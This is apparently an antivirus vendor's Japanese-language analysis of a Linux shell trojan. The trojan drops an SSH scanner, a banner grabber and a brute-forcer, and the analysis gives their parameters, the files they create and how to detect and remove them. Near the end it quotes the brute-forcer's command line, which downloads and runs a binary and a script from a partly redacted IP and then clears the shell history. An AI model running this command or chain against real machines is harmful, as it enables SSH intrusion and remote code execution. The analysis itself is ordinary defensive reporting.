解析者: Joshua Paul Ignacio   

 別名:

N/A

 プラットフォーム:

Linux/Unix

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
    なし

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、リモートサイトから他のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。

  詳細

ファイルサイズ 1,226 bytes
タイプ Other
メモリ常駐 なし
発見日 2020年5月20日
ペイロード ファイルの削除, ファイルのダウンロード, プロセスの強制終了, URLまたはIPアドレスに接続, ファイルの実行

侵入方法

マルウェアは、リモートサイトから以下のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • /{Malware Path}/motd
  • /{Malware Path}/shitscanner → Detected as HackingTools_Shark
    • A scanner that will search for hosts in the internet with an open Port 22.
    • The results will be stored in bios.txt
    • It accepts the following parameters:
      • Port Number
      • -a or -b (class)
        • -a (A network) must be between 1 and 254
        • -b (B network) example: 192.168
      • -i (interface)
      • -s (speed)
  • /{Malware Path}/boner → Detected as HackTool.Linux.BANGRAB.A
    • Grabs the banner of the IP addresses indicated in the "infile" paramater
    • The results will be stored in banner.log
    • The contents of banner.log will then be filtered by listing IP addresses of machines with OpenSSH running on Port 22.
    • The filtered list will be stored on mfu.txt
    • It accepts the following parameters:
      • infile - a text file that contains IP addresses
      • port
      • threads - concurrent IPs being scanned
  • /{Malware Path}/brute → Detected as HackTool.Linux.SSHBRUTE.GA
    • a Haiduc scanner
    • It will use the following as arguments to connect, download and execute files to gain control over its target:
    • Successfully compromised machines will be saved in gasite.txt

他のシステム変更

マルウェアは、以下のファイルを削除します。

  • /{Malware Path}/bios.txt
  • /{Malware Path}/mfu.txt
  • /{Malware Path}/banner.log

プロセスの終了

マルウェアは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。

  • shitscanner
  • boner

その他

マルウェアは、以下を実行します。

  • It executes the dropped files with the following paramaters:
    • timeout $timeout ./{Malware Path}/shitscanner $port -i $interface -s $speed
      • where:
        • $timeout - 130
        • $port - 22
        • $interface - eth0
        • $speed - 10
    • ./{Malware Path}/boner bios.txt 22 3500
    • ./{Malware Path}/brute 9999 -f mfu.txt pass_file 22 "wget http://{BLOCKED}.{BLOCKED}.17.186/AB4g5/kiga.x86 ;chmod 777 *; ./kiga.x86 ROOTS; rm -rf kiga*;wget http://{BLOCKED}.{BLOCKED}.17.186/kit.sh ;sh kit.sh; history -c"
      • where:
        • pass_file - list of credentials stored

  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 15.882.02
初回 VSAPI パターンリリース日 2020年5月20日
VSAPI OPR パターンバージョン 15.883.00
VSAPI OPR パターンリリース日 2020年5月21日

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.SH.ETIN.B」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください